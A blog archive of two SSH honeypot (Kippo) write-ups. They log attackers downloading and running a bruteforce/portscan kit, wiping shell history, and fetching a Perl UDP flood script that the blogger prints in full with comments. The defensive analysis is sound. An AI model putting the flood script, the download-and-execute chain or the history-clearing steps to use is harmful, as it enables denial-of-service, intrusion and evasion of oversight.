Skip navigation

Tag Archives: kippo

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.


1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

– a213ebd69fbc11d612d0374b373f65d8
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

– the user:pass permutations from ‘’

– cbf0f41bbbafb1c2609bedb943be3b36

– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

– contains the results from ‘a’

– gathers system information, saves it to ‘info2’, mails it to
– given the first 3 quarters of an IP address, executes ‘a’ on each of the 255 addresses within that space
– periodically, the results are mailed home to
– the author has also never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

    Wall of Shame:

Attack Source:
Malware Host:
Malware Type: portscan / bruteforce
Phones Home: /

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    09:27    0.00s  0.00s  0.00s w
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget
--2012-10-25 09:30:05--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history

Seems a little odd that our friend (which appears to be a residential (but dynamically assigned…) IP) would go through so much effort just to disconnect the session, but oh well.

I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
15:34:22 up 13 days, 1:55, 1 user, load average: 0.00, 0.00, 0.00
root pts/0 15:34 0.00s 0.00s 0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget
--2012-10-08 15:35:37--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget
--2012-10-08 15:36:00--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
dev:~# chmod +x *
dev:~# perl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl 12
perl: Segmentation fault

This looks like a fairly typical attack. In short:

  • The hacker has connected from The hacker runs w to see who else is around.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads, presumably to check the speed of the connection.
  • The hacker downloads hxxp:// Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.

Now we can take a look at How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:


use Socket;


if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;

# Flood the given port
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

# Flood a random port
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.